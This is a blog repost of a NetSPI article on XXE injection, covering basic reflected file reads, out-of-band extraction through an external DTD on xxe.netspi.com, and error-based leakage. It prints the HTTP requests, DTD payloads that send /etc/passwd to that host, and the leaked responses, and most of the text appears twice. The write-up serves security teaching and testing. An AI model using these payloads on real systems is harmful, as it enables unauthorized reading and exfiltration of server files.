- 浏览: 278230 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red.
However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed.
Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at http://xxe.netspi.com.
Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests.
At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com.
Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page.
I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:
If the server displays verbose errors to client, the error may contain the file contents of the file that’s getting extracted. Below is an example:
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
The invalid file path causes a “FileNotFoundException”, and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it
XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red.
引用
HTTP Request:
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&netspi;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&netspi;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>
However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed.
Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at http://xxe.netspi.com.
引用
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'> %param1; %external;
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'> %param1; %external;
Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests.
引用
HTTP Request:
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>
At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com.
Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page.
I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:
引用
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
If the server displays verbose errors to client, the error may contain the file contents of the file that’s getting extracted. Below is an example:
引用
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
The invalid file path causes a “FileNotFoundException”, and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it
发表评论
-
linux 安装scrapy
2015-09-07 13:06 567由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 394based on our case, we need to h ... -
wpscan
2015-08-01 10:39 404https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2119最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 311http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 317解释: http://securitycafe.ro/2015 ... -
CVE-2011-2461
2015-03-31 01:19 389http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 540原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 401https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1557https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 621参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4028原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 819原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 611http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1940原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4151. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 615Sinatra是一个超轻量级web框架 介绍:http://w ... -
Shellshock示例
2014-12-19 01:21 294来自:http://pastebin.com/Qbgn09Wa ... -
使用Tesseract 识别验证码
2014-12-10 00:48 768参考: http://code.google.com/p/te ...
相关推荐
zero forcing equalizer3tap
获取hycom数据,用于FVCOM程序输入文件制作
这是Mathy Vanhoef关于破解wifi加密协议WPA/WPA2使用的密钥重安装攻击方法的论文Key Reinstallation Atacks Forcing Nonce Reuse in WPA2的翻译
Zero Forcing Equalizer
Script for computing the BER for BPSK modulation in a Rayleigh fading channel with 2 Tx, 2Rx MIMO channel Zero Forcing equalization
Zero Forcing Equalization for Complex Channel
分簇的多用户干扰网络协调迫零算法研究,何盛杰,啜钢,在小规模干扰网络中,传统迫零算法能够完全地消除干扰。然而随着实际系统中用户数量增多,由于天线数量的限制导致信道矩阵不能提
Technology innovations and evolving business models are part of a rapid change that is forcing corporate and management professionals to learn, deploy, and adopt IT in new ways in order to maintain a ...
主要介绍了MySQL错误Forcing close of thread的两种解决方法,需要的朋友可以参考下
zero forcing algorithm for energy detection
Air Pollution as a Climate Forcing.pptx
Codes for ofdm implementation using zero forcing equalization.
zero-forcing beamforming with semi-orthogonal user selection
这是一个zero forcing 平衡器。可以在此基础上更改调整
课程project,绝对可用,压缩包内含结果图。
the forcing period, the unidirectional transport can be analytically treated. By solving the Fokker–Planck equations, we get an analytical expression of the current. This result indicates that with ...
qy_Qualitative A... Forcing Term_郑志明.caj
a low-complexity zero-forcing cfo compensation scheme for ofdma uplink systems.pdf
015扩展1:Scheduled Sampling(计划采样)与2. Teacher forcing(教师强制)